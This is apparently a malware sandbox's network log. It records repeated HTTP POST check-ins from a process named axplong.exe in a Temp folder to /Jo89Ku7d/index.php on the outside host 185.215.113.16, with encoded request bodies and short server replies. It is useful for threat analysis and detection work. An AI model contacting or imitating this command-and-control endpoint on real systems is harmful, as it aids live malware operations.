Sep 27, 2024 00:21:44.139190912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49834	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:44.148298979 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:45.170546055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49835	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:45.280916929 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:46.017177105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49836	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:46.029953957 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:46.752209902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49837	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:46.881067991 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:47.617619038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49838	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:47.628515959 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:48.328773022 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49839	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:48.454063892 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:50.059190989 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:50.060899019 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:50.061918974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:21:50.062808037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49840	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:50.070661068 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:50.841761112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49841	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:50.958353996 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:51.682055950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49842	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:51.691263914 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49843	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:51.811285973 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:52.598628044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49844	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:52.608445883 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:53.322808981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49845	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:53.436492920 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:54.126987934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49846	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:54.139056921 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:54.861850977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49847	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:54.985668898 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:55.694710970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49848	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:55.704226017 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:56.622097969 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 27, 2024 00:21:56.622486115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49849	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:56.736440897 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:57.445558071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49850	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:57.455348969 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:58.159631968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49851	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:58.281975031 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:21:58.988626003 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49852	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:58.997355938 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:21:59.733243942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:21:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	49853	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:21:59.861289978 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:22:00.568489075 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49854	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:00.593746901 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:22:01.311024904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:22:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	49855	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:22:01.432305098 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
